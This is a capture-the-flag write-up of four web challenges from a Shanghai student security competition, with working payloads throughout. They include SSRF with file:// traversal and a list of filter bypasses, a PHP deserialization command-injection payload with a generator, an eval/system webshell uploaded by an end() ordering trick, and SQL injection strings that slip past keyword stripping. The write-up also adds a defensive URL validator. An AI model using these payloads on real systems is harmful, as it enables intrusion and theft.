4th Shanghai University Student Cybersecurity Competition, Online Round: Web Write-up

Been reviewing for the network engineer exam lately; a bit tired, a bit fried.

Daily review and practice still can't slip, though~~

Keep going.

web1


The page source carries a hint: robots.txt lists source.php and flag.php.

Requesting source.php returns:

```
you need to login as admin!<!-- post param  'admin' -->
```

POSTing admin=1 returns:

```
you need to login as admin!<!-- post param  'admin' -->only 127.0.0.1 can get the flag!!
```

Tried the usual client-IP headers one by one:

```
X-Forwarded-For: 127.0.0.1
Contact: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Referer: 127.0.0.1
From: 127.0.0.1
X-Wap-Profile: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
```

X-Client-IP: 127.0.0.1 is the one the server trusts; the response becomes:

```
you need to login as admin!<!-- post param  'admin' -->you need post url: http://www.ichunqiu.com
```

POSTing admin=1&url=http://www.ichunqiu.com returns:

```
you need to login as admin!<!-- post param  'admin' -->http://www.ichunqiu.com<img src="download/409352793;img1.jpg"/>
```

The fetched content is served back under the URI download/409352793;img1.jpg, so the server fetches whatever URL we hand it and stores the result: a classic SSRF.

The fetcher also accepts the file:// scheme, and the check on the URL evidently only looks for the string www.ichunqiu.com, so keep that host name in place and climb out of it with ../ to read flag.php from the web root:

```
admin=1&url=file://www.ichunqiu.com/../../../var/www/html/flag.php
```

Parameter names that often point at SSRF:

```
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
```

When the target URL is filtered, try the following tricks:

1. Userinfo with @
   `http://abc@127.0.0.1`

2. Add a port number
   `http://127.0.0.1:8080`

3. A URL shortener
   `http://dwz.cn/11SMa`

4. A wildcard domain that resolves to any IP: xip.io
   `10.0.0.1.xip.io = 10.0.0.1`
   `www.10.0.0.1.xip.io = 10.0.0.1`
   `mysite.10.0.0.1.xip.io = 10.0.0.1`
   `foo.bar.10.0.0.1.xip.io = 10.0.0.1`

5. Write the IP address in another base (inet_aton() accepts decimal, octal with a leading 0 and hex with 0x, and also fewer than four parts)
   `115.239.210.26 = 1945096730` (decimal)
   `115.239.210.26 = 016373751032` (octal)
   `115.239.210.26 = 0x73efd21a` (hex)
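The bypasses above, and the file:// payload used in web1, all defeat a check that looks at the raw URL string. The following is an added example (not code from the page or the challenge) that canonicalises the host the way the fetcher's resolver will see it: it strips `user@` and `:port`, expands inet_aton()'s decimal/octal/hex forms to a dotted quad, extracts the address embedded in an xip.io name, and then applies a scheme allow-list and an address-class check. The naive substring check is included only for contrast; the host names and addresses in the tests are the ones from the list above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Wildcard-DNS hosts that embed the target address: 10.0.0.1.xip.io, www.10.0.0.1.xip.io, ...
XIP_RE = re.compile(r'(?:^|\.)(\d{1,3}(?:\.\d{1,3}){3})\.xip\.io$')
NUMERIC_PART = re.compile(r'0x[0-9a-f]+|[0-9]+', re.IGNORECASE)


def c_int(token):
    """Parse one address component the way inet_aton() does: 0x.. hex, leading 0 octal, else decimal."""
    t = token.lower()
    if t.startswith('0x'):
        return int(t[2:], 16)
    if len(t) > 1 and t[0] == '0':
        return int(t, 8)
    return int(t, 10)


def inet_aton_canonical(host):
    """Expand the lenient inet_aton() forms (a, a.b, a.b.c, a.b.c.d with hex/octal/decimal parts)
    to a dotted quad, or return None when host is not a numeric IPv4 address."""
    parts = host.split('.')
    if not 1 <= len(parts) <= 4 or not all(NUMERIC_PART.fullmatch(p) for p in parts):
        return None
    try:
        vals = [c_int(p) for p in parts]
    except ValueError:            # e.g. "09" is not valid octal
        return None
    # every leading part is one byte; the last part fills the remaining bytes
    tail_bits = 8 * (5 - len(vals))
    if any(v > 255 for v in vals[:-1]) or vals[-1] >= (1 << tail_bits):
        return None
    n = 0
    for v in vals[:-1]:
        n = (n << 8) | v
    n = (n << tail_bits) | vals[-1]
    return str(ipaddress.IPv4Address(n))


def canonical_host(url):
    """Effective target host: numeric forms and xip.io names collapse to a dotted quad,
    anything else is returned lower-cased. urlsplit() already drops user@ and :port."""
    host = (urlsplit(url).hostname or '').lower()
    m = XIP_RE.search(host)
    if m:
        return m.group(1)
    return inet_aton_canonical(host) or host


def naive_blocklist(url):
    """The kind of check the bypass list defeats: a substring match on the raw URL."""
    return '127.0.0.1' not in url and 'localhost' not in url


def is_safe_target(url):
    """Scheme allow-list plus an address-class check on the canonical host.
    A name that is not an IP literal still has to be resolved and the *resolved* address
    re-checked (and then connected to directly, to defeat DNS rebinding); that network
    step is outside this offline example, so such names are passed through here."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ('http', 'https'):
        return False                        # file://, gopher://, dict:// and friends
    host = canonical_host(url)
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True                         # hostname: resolve and re-check, see docstring
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)
```

The IPv6 loopback `http://[::1]/` needs no special case: `ipaddress.ip_address('::1')` already reports it as loopback.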

web2


Requesting .index.php.swp on the home page returns a Vim swap file containing the source. Recover it with:

```
vi -r index.php    # recover index.php from .index.php.swp
```
```php
<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    // runs on unserialize(): every argument is trimmed and pushed through waf()
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    // strips < > * ; | ? newline and space, then deletes the literal word 'flag'
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    // $host is interpolated into a shell command unquoted
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
// only the first GET parameter becomes a variable via $$key
foreach($_GET as $key => $value) {
    if($i===1)
    {
        $i++;
        $$key = $value;
    }
    else{break;}
}
if($first==="doller")
{
    // parse_str() with a single argument registers the parsed keys as variables
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }

}
else
{
    echo "Can you hack me?<br>";
}
?>
```

This is the standard combination: variable overwriting to reach the unserialize() call, then a deserialization gadget.

Only the first GET parameter is assigned through `$$key = $value`, so `first=doller` has to come first; the other three checks are satisfied through `parse_str($_GET['a'])`, which with a single argument registers the parsed keys as variables (deprecated since PHP 7.2, removed in 8.0). The `&` separators inside `a` must be URL-encoded so they stay part of `a`:

```
?first=doller&a=var=give%26bbb=me%26ccc=flag
```

Then POST the serialized object in `come`. On unserialize(), __wakeup() runs waf() over every argument: spaces, `<>*;|?` and newlines are stripped and the word `flag` is deleted. `$IFS` takes the place of the space, and writing `fla\g` keeps str_replace() from matching while the shell simply drops the backslash, so __destruct() ends up running `system("echo `cat$IFS/fla\g`")`. Since serialize() only records the class name and the two private properties, the generator needs nothing else:

```php
<?php
// Payload generator for web2. serialize() only records the class name and the
// two private properties, so the waf/echo/__destruct methods are not needed here.
class come{
    private $method;
    private $args;
    function __construct() {
        $this->method = "echo";
        // $IFS replaces the filtered space; the backslash in fla\g defeats
        // str_replace('flag', ...) but is removed again by the shell.
        $this->args = array("host"=>"`cat\$IFS/fla\g`");
    }
}

$come = new come();
echo urlencode(serialize($come));
```

Generated payload (private property names are stored as `\0come\0method` and `\0come\0args`, hence the `%00` bytes and the string lengths 12 and 10):

```
O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A15%3A%22%60cat%24IFS%2Ffla%5Cg%60%22%3B%7D%7D
```
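To see the three pieces of the bypass working together, here is an added Python example (not from the page): a port of the challenge's waf(), a serializer that reproduces PHP's private-property encoding for `come`, and a run of the surviving argument through `sh` so the `$IFS` expansion and the dropped backslash can be observed. The scratch directory name `web2_ifs_demo` and the sample file content are constructed for the demo; the generated string is compared against the payload printed above.

```python
import os
import re
import subprocess
import tempfile
from urllib.parse import quote

# The page's own payload, URL-encoded exactly as printed there, kept for comparison.
PAGE_PAYLOAD = ('O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22'
                '%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A15%3A'
                '%22%60cat%24IFS%2Ffla%5Cg%60%22%3B%7D%7D')


def waf(value):
    """Port of come::__wakeup() + come::waf(): trim, strip < > * ; | ? newline space, drop 'flag'."""
    value = re.sub(r'[<>*;|?\n ]', '', value.strip())
    return value.replace('flag', '')


def php_serialize_come(method, args):
    """serialize() output for a `come` object. Private properties are stored as
    "\\0come\\0name", and the s:N: length counts those NUL bytes."""
    def s(v):
        return 's:%d:"%s";' % (len(v.encode()), v)
    body = s('\0come\0method') + s(method)
    body += s('\0come\0args') + 'a:%d:{' % len(args)
    for k, v in args.items():
        body += s(k) + s(v)
    body += '}'
    return 'O:4:"come":2:{%s}' % body


def build_host_arg(path):
    """Value for the `host` key: $IFS stands in for the filtered space, and every 'flag'
    is written 'fla\\g' so str_replace() misses it while the shell drops the backslash."""
    return '`cat$IFS%s`' % path.replace('flag', 'fla\\g')


def make_payload(path='/flag'):
    """URL-encoded value for the `come` POST parameter."""
    arg = build_host_arg(path)
    if waf(arg) != arg:
        raise ValueError('argument would be altered by waf(): %r' % waf(arg))
    return quote(php_serialize_come('echo', {'host': arg}), safe='')


def run_echo(host_arg):
    """Emulate system("echo $host") and return what the shell printed."""
    proc = subprocess.run(['sh', '-c', 'echo ' + host_arg], capture_output=True, text=True)
    return proc.stdout.strip()


def demo_read_through_filter(content='flag{constructed-sample}'):
    """Write `content` to a scratch file named flag and read it back through the filtered argument."""
    scratch = os.path.join(tempfile.gettempdir(), 'web2_ifs_demo')   # no spaces, no 'flag' in the dir name
    os.makedirs(scratch, exist_ok=True)
    path = os.path.join(scratch, 'flag')
    with open(path, 'w') as fh:
        fh.write(content + '\n')
    try:
        arg = build_host_arg(path)
        if waf(arg) != arg:
            raise ValueError('scratch path contains a filtered character')
        return run_echo(arg)
    finally:
        os.remove(path)


if __name__ == '__main__':
    print(make_payload('/flag') == PAGE_PAYLOAD)
    print(demo_read_through_filter())
```

`$IFS` works because the variable name ends at the `/`, and the unquoted expansion of whitespace is itself subject to field splitting, so `cat$IFS/flag` becomes the two words `cat` and `/flag`.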

web3


Home page source:

```php
<?php
//error_reporting(0);
//$dir=md5("icq" . $_SERVER['REMOTE_ADDR']);
$dir=md5("icq");
$sandbox = '/var/sandbox/' . $dir;
@mkdir($sandbox);
@chdir($sandbox);

if($_FILES['file']['name']){
    $filename = !empty($_POST['file']) ? $_POST['file'] : $_FILES['file']['name']; // POST 'file' wins over the upload's own name
    if (!is_array($filename)) {
        $filename = explode('.', $filename);
    }
    $ext = end($filename); // last element of the array, in insertion order
    if($ext==$filename[count($filename) - 1]){
        die("emmmm...");
    }
    $new_name = (string)rand(100,999).".".$ext;
    // php/. bypasses unlink
    move_uploaded_file($_FILES['file']['tmp_name'],$new_name);
    $_ = $_POST['hehe'];
    if(@substr(file($_)[0],0,6)==='@<?php' && strpos($_,$new_name)===false){
        include($_);
    }
    unlink($new_name);
}
else{
    highlight_file(__FILE__);
}
```

The check hinges on end() returning the last element in insertion order, which is not necessarily the element with the highest index:

```
php > $a=array();
php > $a[1]=123;
php > $a[0]=456;
php > echo end($a);
456
```

So send `file` as an array whose last-inserted element is the extension: end() returns it while `$filename[count($filename)-1]` returns a different element, and the `emmmm...` check is passed with `$ext` still ending in php. With the extension `php/.`, the upload still lands as a .php file while unlink("NNN.php/.") fails, so the file survives the request; the `hehe` parameter may not contain `$new_name` (`NNN.php/.`), but `NNN.php` does not contain it. Upload a webshell like this one:

```
@<?php
@eval(system("cat /flag"));
?>
```

The first six characters must be exactly `@<?php`, because `file($_)[0]` is compared against that prefix before include().

Then brute-force the three-digit file name (100 to 999) through `hehe` to include the shell and read the flag.

Upload page HTML (the two hidden inputs are what turns `file` into the array the end() trick needs; a plain `file=123456` would be exploded into a single element and die):

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<!-- file[0] is inserted last, so end() returns "php/." while $filename[count-1] reads file[1];
     the two differ and the check passes. The extension php/. keeps unlink() from removing the file. -->
<form action="http://038fde476c644c649c05c7100b41a532c772bf65d02e4fcc.game.ichunqiu.com/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="file[1]" value="123456" />
<input type="hidden" name="file[0]" value="php/." />
<input type="file" name="file" />
<input type="submit" />
</form>

</body>
</html>
```
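To make the ordering subtlety concrete, here is an added Python port of the upload branch above (example code, not part of the page or the challenge). `php_post_array()` builds the insertion-ordered array PHP would create from `file[1]=...&file[0]=...`, `php_end()` mirrors end(), and `server_decision()` returns the stored name and whether `hehe` would be included; rand() is replaced by a fixed `rand_name` (assumed 123) so results are deterministic.

```python
from urllib.parse import parse_qsl


def php_post_array(query):
    """Ordered PHP array for keys of the form file[N]=value, in the order they arrive.
    Only the single-level numeric form used by the challenge is handled."""
    arr = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.startswith('file[') and key.endswith(']'):
            arr[int(key[5:-1])] = value
    return arr


def php_end(arr):
    """PHP end(): the last element in insertion order, False for an empty array."""
    return list(arr.values())[-1] if arr else False


def prefix_ok(content):
    """substr(file($_)[0], 0, 6) === '@<?php': the first line must start with that prefix."""
    return content.split('\n')[0][:6] == '@<?php'


def server_decision(post_file, upload_name, hehe='', rand_name=123):
    """Port of the upload branch. Returns (new_name, included); new_name is None when the
    'emmmm...' branch dies. post_file is $_POST['file'] (str, dict or ''), upload_name
    is $_FILES['file']['name']."""
    filename = post_file if post_file else upload_name          # !empty($_POST['file']) ? ... : ...
    if not isinstance(filename, dict):
        filename = dict(enumerate(filename.split('.')))          # explode('.', $filename)
    ext = php_end(filename)
    if ext == filename.get(len(filename) - 1):                   # $filename[count($filename) - 1]
        return None, False
    new_name = '%d.%s' % (rand_name, ext)
    # strpos($_, $new_name) === false: hehe may reference NNN.php but not NNN.php/.
    included = bool(hehe) and new_name not in hehe
    return new_name, included


if __name__ == '__main__':
    arr = php_post_array('file[1]=123456&file[0]=php/.')
    print(arr, server_decision(arr, 'shell.php', hehe='123.php'))
```

A plain string for `file`, or the same two keys sent in the opposite order, always dies: explode() or the ordering makes end() and the `count-1` index agree.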

web4


The home page is SQL-injectable. Some characters are filtered: `from` and `select` are replaced with the empty string, so write each keyword with a copy of itself nested inside; the single-pass replacement removes the inner copy and leaves the outer one intact (`selselectect` → `select`, `frfromom` → `from`, `unifromon` → `union`):

```
id=-1' or (selselectect 1)#
```

Payloads:

```
-1' unifromon selselectect (seselectlect database()),2#
-1' unifromon selselectect (seselectlect group_concat(table_name) frfromom information_schemafrom.tables where table_schema=database()),2#
-1' unifromon selselectect (seselectlect group_concat(column_name) frfromom information_schemafrom.columns where table_schema='web' and table_name='user'),2#
-1' unifromon selselectect (seselectlect concat_ws(char(32,58,32),id,username,password) frfromom web.user),2#
```

The injection returns the following; the leading fragment is a line of the filter itself leaked by the application, and it shows the blacklist is applied as one str_replace() per keyword:

```
$content=str_replace($value,"",$content)1 : admin : e3274be5c857fb42ab72d786e281b4b8
```

The password is adminpassword.

Logging in leads to a file-upload page that wants a file named flag.php.

PHP files are rejected, though, and the server appends .txt to the uploaded name.

The stored name is built by concatenating `uploaddir`, `file` and `Field`, and a %02 byte inserted into the name truncates it there, so the appended .txt never reaches the saved filename.

Upload succeeds.
